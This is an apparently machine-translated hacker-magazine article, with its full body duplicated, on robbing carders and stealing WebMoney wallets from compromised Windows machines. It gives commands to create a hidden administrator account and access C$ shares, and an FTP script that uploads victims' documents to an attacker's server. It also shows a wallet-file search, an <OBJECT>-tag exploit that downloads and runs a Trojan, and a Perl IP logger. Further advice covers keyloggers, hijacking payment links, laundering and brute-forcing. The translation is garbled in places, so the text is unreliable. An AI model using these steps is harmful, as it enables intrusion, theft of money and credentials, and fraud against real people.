Hello! All people earn their living. And in various ways. Some people choose to get rich in the virtual world. At the same time, the earnings themselves are not always honest. A person takes risks, conducts important banking operations, sells credit cards, buys various things... and at some point loses everything. Due to his own inattention, he is completely robbed by hacker Vasya from Mukhosransk. Why is this happening, and how does the hacker manage to attack seemingly protected carders? Let's try to figure it out.
Let's tame the system!
There are a lot of ways to steal valuable information and carder's savings. But it is worth making a reservation that in this case the main thing is not quantity, but quality, that is, the successful application of these methods.
So, it's time to tell you how a hacker can steal data from a victim. First, it is hacking the rich Pinocchio's computer. Here-how lucky, nothing can be said for sure. If a person is a bugger and does not read bugtracks, then the chances of a hacker increase dramatically. Otherwise, and even with a firewall installed on the machine, this method is not suitable.
How do they break user workstations? There are also different ways. Let's focus on bazhnaya WinNT. Have you always thought that if Windows has the NT prefix, then it has one hundred percent protection? I'm going to disappoint you. Very dangerous bugs were found in such platforms.
RPC epidemic
If you don't know about the RPC vulnerability, then you have a late ignition. This bug was trumpeted by all security portals, and many exploits were released, including for Windows (a paradise for scriptkids). How can a hacker make money from a naive bourgeois who probably doesn't even know about the existence of an RPC bug patch? Very simple. It is enough to get access to his system and type a number of console commands. After that, all important documents will be in the hands of the attacker.
I'm not going to teach you how to exploit a vulnerability. This was reported by various hacker portals, as well as Hacker #9. I'll just draw your attention to some commands that might be useful to an attacker who has taken over the rights to the victim's system.
To avoid using a noisy exploit (which, by the way, can destroy RPC calls and cause the system to crash) every time, you can create an administrator account. It is known that it will be used for such resources as C$, D$ and others. This is very easy to do. Just type the following lines:
net user admin nimda /add (we add a new user admin with the password nimda, you can substitute your own parameters).
net localgroup Administrators admin /add (assign the user the Administratots group).
If the platform localization is not in English, you must enter the group name in your native language. To do this, the hacker types "net user" and finds out the true name of the group.
If everything was done correctly (the net command will definitely inform the hacker about the result of the operation), the attacker can log in to the machine from the local computer. The "net use z: \\IP-ADDRESS\C$" command helps them do this. But it will never do this for one simple reason — the machine is logged, and its IP address will definitely be recorded. But there is a way out — the hacker enters not from himself, but from his favorite skarzhenny shell.
smbclient //IP-ADDRESS/$C -U admin
This command is relevant for Linux. After requesting a password, the hacker gets into the $C system resource (in order to perform such actions, the hacker pre-installs the samba package on the machine).
But sometimes just accessing directories isn't enough. For example, in the case when you need to protect the user or install a keylogger on the machine (as well as view the list of processes, kill one of them, etc., etc.). In this case, the hacker either hangs an additional backdoor or uses an exploit every time.
Those who seek will always find it
There is nothing tricky about finding information. If the hacker is impatient (and there aren't many of them), he just rummages through folders and downloads files with suspicious names (such as 1111.doc or paroli.doc). Text files can be read on the spot with the "type file" command. Many guides on hacking Windows write about a mandatory account on some TFTP server. However, you can perform the operation via the normal ftp command. A pre-compiled script consists of simple operations transmitted by ftp. It can look, for example, like this:
example of an FTP script
user vasya vasya123
type binary
put document.doc /xakep/document.doc
quit
After the script is compiled (script commands are sequentially written to a file using echo and standard input redirection), it is passed to the console utility using the-s: file_name parameter. Please note that authentication was performed in one command, so we add the-n option to the command line.
It should be noted that there is no search command in Windows, which is present in Linux. However, this does not mean that it is impossible to find the file in the console. The subject of hunting for a hacker is WebMoney wallets that have the kwm and pwm extensions. You can find them with the following command:
dir /S c:\ | find *.? wm
This will recursively output all directories from the c drive.:\ and then filter the files using the find command.
WebMoney - hacker's joy
After the WebMoney wallets are downloaded, you need to find out the account ID (this will be performed by the client), as well as the login password. The WebMoney password cannot be changed and is set only once (similar to the PIN code in a credit card), so it is possible that the user wrote it down in a file so as not to forget it. With a successful combination of circumstances, the hacker pulls out this file and wallets and takes full possession of the victim's account. Attention! This is very dangerous, because the money transfer system has a history of all operations performed. I will say from experience that hackers have their own people who launder money on the account, taking a certain percentage of the amount for services.
There are other ways to extract a password. For example, a hacker managed to find out several passwords that the victim uses on the Network. It tries to go through all of them and maybe one of them will be correct. When there are no other ways, you can find a suitable keylogger that sends a keyboard dump to the enemy's e-mail address. After it is launched on the computer, you can only wait until the user uses the WebMoney client. There is a way to speed up this process by sending a message to the victim stating that the wallet has been replenished with a certain amount. Then it will definitely launch the client.
In general, there is another method of getting a WM wallet. It is practiced among rich, but extinct individuals who have recently but successfully comprehended card fraud. A program is created, such as "Internet quacker", but it does not quack the Internet, but steals WebMoney wallets. To implement it — a couple of trifles, the problem is something else-to sell the program to the victim. This can be done by a good hacker with extensive experience in social engineering.
You can find the source code of this small program in the sidebar. The full source code of the project is available on Yandex. Disk.
In addition to the WebMoney service itself, there is also the Merchant service, which is needed for conducting online operations to transfer money from one WM wallet to another. The service is usually used in various projects, such as online stores. If a hacker breaks into such a resource, they simply replace the link and parameters to their WebMoney wallet in the source code of the script. In this case, the client will send money to the attacker's account. Undoubtedly, this will soon be noticed, but the cracker will have time to enrich himself.
Gaps in the donkey
RPC vulnerability is not the only bug in the windows. Let's look at another example — an error in processing the <OBJECT> tag, which allows executing arbitrary code on the client's machine. Having implemented such a vulnerability, a hacker does not need to upload a Trojan to the victim, and even write down his IP address in the log, which will later be checked for infection with a backdoor.
To write an exploit, just create the following html document:
<object data="/object.html"> Обширный шалом всем</object>
A b object.html put a script, for example, in Visual Basic. It will download the Trojan to the specified address and then launch it. If you want, you can fantasize about writing a backdoor to the registry (unless, of course, it already has such a function implemented), but this is exclusively the problem of an intruder.
To write an IP address to a log file, you need to write a simple perl script. For example, this:
#! /usr/bin/perl print «Content-type: text/html\n\n»; $ip=$ENV{REMOTE_ADDR}; open (LOG,"≫ipz.log»); print LOG «$ip\n»; close (LOG);
A redirect is made to this script from the main page, or an SSI tab is called, for example, the following:
<!--#exec cgi="/path/to/iplog.cgi"-->.
Keep in mind that to perform SSI inserts, the file must be given the shtml extension. As for the files to write (ipz.log), they must have the attribute 666.
The idea of this method is to send malicious programs to the victim's computer, using the gaps in the operating system. You can find a regularly updated list of vulnerabilities on any security portal.
But what about Linux?
As for Linux, all the methods of this seemingly impregnable system were described in the article of this issue "Find and fuck!". In this system, you can find, perhaps, only credit cards and files that store passwords, as well as accounts for any resources.
Data sniffing is an effective way to steal information. A sniffer is a program that intercepts all traffic on certain interfaces and selects the information specified in the sniffer conf. There are quite a few programs that intercept all traffic and write it to logs (while filtering remains a hacker's problem). Basically, sniffers are conveniently configured and run unnoticed on the server.
The principle of all sniffers is based, as I said, on intercepting data from a specific network interface. At the same time, promisc mode is set, in which all data passes through the network card, despite the fact that it was intended for other machines. You can probably guess that you can only successfully use a sniffer on computers that perform the function of routers. If this is the case, the hacker will intercept all traffic on the local network.
Recently, sniffers are written by very competent people. They are not able to detect any utilities, such as ps, ifconfig, IDS, and others.
Another interesting method of hacking(brute-forcing) passwords for a specific service. I've heard about such private projects as https account overkill. Thus, it is quite possible to hack a businessman's account on any security service.
I'm not even talking about brute-forcing passwords on insecure services that can be sniffed. There are plenty of such brute-forcers on the Internet, and most of them support multithreaded brute-forcing. Of course, the days when root/root or admin/admin pairs were used as accounts have passed, but dictionary passwords are very common. So it becomes quite realistic to choose a password.
Thus, I summarize. Account theft is a hot topic. Steal all who are not lazy, and what is bad lies. Therefore, if you are a successful network businessman, I recommend protecting your system with the necessary patches, as well as a properly configured firewall. Only then will you be absolutely safe.
Let's tame the system!
There are a lot of ways to steal valuable information and carder's savings. But it is worth making a reservation that in this case the main thing is not quantity, but quality, that is, the successful application of these methods.
So, it's time to tell you how a hacker can steal data from a victim. First, it is hacking the rich Pinocchio's computer. Here-how lucky, nothing can be said for sure. If a person is a bugger and does not read bugtracks, then the chances of a hacker increase dramatically. Otherwise, and even with a firewall installed on the machine, this method is not suitable.
How do they break user workstations? There are also different ways. Let's focus on bazhnaya WinNT. Have you always thought that if Windows has the NT prefix, then it has one hundred percent protection? I'm going to disappoint you. Very dangerous bugs were found in such platforms.
RPC epidemic
If you don't know about the RPC vulnerability, then you have a late ignition. This bug was trumpeted by all security portals, and many exploits were released, including for Windows (a paradise for scriptkids). How can a hacker make money from a naive bourgeois who probably doesn't even know about the existence of an RPC bug patch? Very simple. It is enough to get access to his system and type a number of console commands. After that, all important documents will be in the hands of the attacker.
I'm not going to teach you how to exploit a vulnerability. This was reported by various hacker portals, as well as Hacker #9. I'll just draw your attention to some commands that might be useful to an attacker who has taken over the rights to the victim's system.
To avoid using a noisy exploit (which, by the way, can destroy RPC calls and cause the system to crash) every time, you can create an administrator account. It is known that it will be used for such resources as C$, D$ and others. This is very easy to do. Just type the following lines:
net user admin nimda /add (we add a new user admin with the password nimda, you can substitute your own parameters).
net localgroup Administrators admin /add (assign the user the Administratots group).
If the platform localization is not in English, you must enter the group name in your native language. To do this, the hacker types "net user" and finds out the true name of the group.
If everything was done correctly (the net command will definitely inform the hacker about the result of the operation), the attacker can log in to the machine from the local computer. The "net use z: \\IP-ADDRESS\C$" command helps them do this. But it will never do this for one simple reason — the machine is logged, and its IP address will definitely be recorded. But there is a way out — the hacker enters not from himself, but from his favorite skarzhenny shell.
smbclient //IP-ADDRESS/$C -U admin
This command is relevant for Linux. After requesting a password, the hacker gets into the $C system resource (in order to perform such actions, the hacker pre-installs the samba package on the machine).
But sometimes just accessing directories isn't enough. For example, in the case when you need to protect the user or install a keylogger on the machine (as well as view the list of processes, kill one of them, etc., etc.). In this case, the hacker either hangs an additional backdoor or uses an exploit every time.
Those who seek will always find it
There is nothing tricky about finding information. If the hacker is impatient (and there aren't many of them), he just rummages through folders and downloads files with suspicious names (such as 1111.doc or paroli.doc). Text files can be read on the spot with the "type file" command. Many guides on hacking Windows write about a mandatory account on some TFTP server. However, you can perform the operation via the normal ftp command. A pre-compiled script consists of simple operations transmitted by ftp. It can look, for example, like this:
example of an FTP script
user vasya vasya123
type binary
put document.doc /xakep/document.doc
quit
After the script is compiled (script commands are sequentially written to a file using echo and standard input redirection), it is passed to the console utility using the-s: file_name parameter. Please note that authentication was performed in one command, so we add the-n option to the command line.
It should be noted that there is no search command in Windows, which is present in Linux. However, this does not mean that it is impossible to find the file in the console. The subject of hunting for a hacker is WebMoney wallets that have the kwm and pwm extensions. You can find them with the following command:
dir /S c:\ | find *.? wm
This will recursively output all directories from the c drive.:\ and then filter the files using the find command.
WebMoney - hacker's joy
After the WebMoney wallets are downloaded, you need to find out the account ID (this will be performed by the client), as well as the login password. The WebMoney password cannot be changed and is set only once (similar to the PIN code in a credit card), so it is possible that the user wrote it down in a file so as not to forget it. With a successful combination of circumstances, the hacker pulls out this file and wallets and takes full possession of the victim's account. Attention! This is very dangerous, because the money transfer system has a history of all operations performed. I will say from experience that hackers have their own people who launder money on the account, taking a certain percentage of the amount for services.
There are other ways to extract a password. For example, a hacker managed to find out several passwords that the victim uses on the Network. It tries to go through all of them and maybe one of them will be correct. When there are no other ways, you can find a suitable keylogger that sends a keyboard dump to the enemy's e-mail address. After it is launched on the computer, you can only wait until the user uses the WebMoney client. There is a way to speed up this process by sending a message to the victim stating that the wallet has been replenished with a certain amount. Then it will definitely launch the client.
In general, there is another method of getting a WM wallet. It is practiced among rich, but extinct individuals who have recently but successfully comprehended card fraud. A program is created, such as "Internet quacker", but it does not quack the Internet, but steals WebMoney wallets. To implement it — a couple of trifles, the problem is something else-to sell the program to the victim. This can be done by a good hacker with extensive experience in social engineering.
You can find the source code of this small program in the sidebar. The full source code of the project is available on Yandex. Disk.
In addition to the WebMoney service itself, there is also the Merchant service, which is needed for conducting online operations to transfer money from one WM wallet to another. The service is usually used in various projects, such as online stores. If a hacker breaks into such a resource, they simply replace the link and parameters to their WebMoney wallet in the source code of the script. In this case, the client will send money to the attacker's account. Undoubtedly, this will soon be noticed, but the cracker will have time to enrich himself.
Gaps in the donkey
RPC vulnerability is not the only bug in the windows. Let's look at another example — an error in processing the <OBJECT> tag, which allows executing arbitrary code on the client's machine. Having implemented such a vulnerability, a hacker does not need to upload a Trojan to the victim, and even write down his IP address in the log, which will later be checked for infection with a backdoor.
To write an exploit, just create the following html document:
<object data="/object.html"> Обширный шалом всем</object>
A b object.html put a script, for example, in Visual Basic. It will download the Trojan to the specified address and then launch it. If you want, you can fantasize about writing a backdoor to the registry (unless, of course, it already has such a function implemented), but this is exclusively the problem of an intruder.
To write an IP address to a log file, you need to write a simple perl script. For example, this:
#! /usr/bin/perl print «Content-type: text/html\n\n»; $ip=$ENV{REMOTE_ADDR}; open (LOG,"≫ipz.log»); print LOG «$ip\n»; close (LOG);
A redirect is made to this script from the main page, or an SSI tab is called, for example, the following:
<!--#exec cgi="/path/to/iplog.cgi"-->.
Keep in mind that to perform SSI inserts, the file must be given the shtml extension. As for the files to write (ipz.log), they must have the attribute 666.
The idea of this method is to send malicious programs to the victim's computer, using the gaps in the operating system. You can find a regularly updated list of vulnerabilities on any security portal.
But what about Linux?
As for Linux, all the methods of this seemingly impregnable system were described in the article of this issue "Find and fuck!". In this system, you can find, perhaps, only credit cards and files that store passwords, as well as accounts for any resources.
Data sniffing is an effective way to steal information. A sniffer is a program that intercepts all traffic on certain interfaces and selects the information specified in the sniffer conf. There are quite a few programs that intercept all traffic and write it to logs (while filtering remains a hacker's problem). Basically, sniffers are conveniently configured and run unnoticed on the server.
The principle of all sniffers is based, as I said, on intercepting data from a specific network interface. At the same time, promisc mode is set, in which all data passes through the network card, despite the fact that it was intended for other machines. You can probably guess that you can only successfully use a sniffer on computers that perform the function of routers. If this is the case, the hacker will intercept all traffic on the local network.
Recently, sniffers are written by very competent people. They are not able to detect any utilities, such as ps, ifconfig, IDS, and others.
Another interesting method of hacking(brute-forcing) passwords for a specific service. I've heard about such private projects as https account overkill. Thus, it is quite possible to hack a businessman's account on any security service.
I'm not even talking about brute-forcing passwords on insecure services that can be sniffed. There are plenty of such brute-forcers on the Internet, and most of them support multithreaded brute-forcing. Of course, the days when root/root or admin/admin pairs were used as accounts have passed, but dictionary passwords are very common. So it becomes quite realistic to choose a password.
Thus, I summarize. Account theft is a hot topic. Steal all who are not lazy, and what is bad lies. Therefore, if you are a successful network businessman, I recommend protecting your system with the necessary patches, as well as a properly configured firewall. Only then will you be absolutely safe.
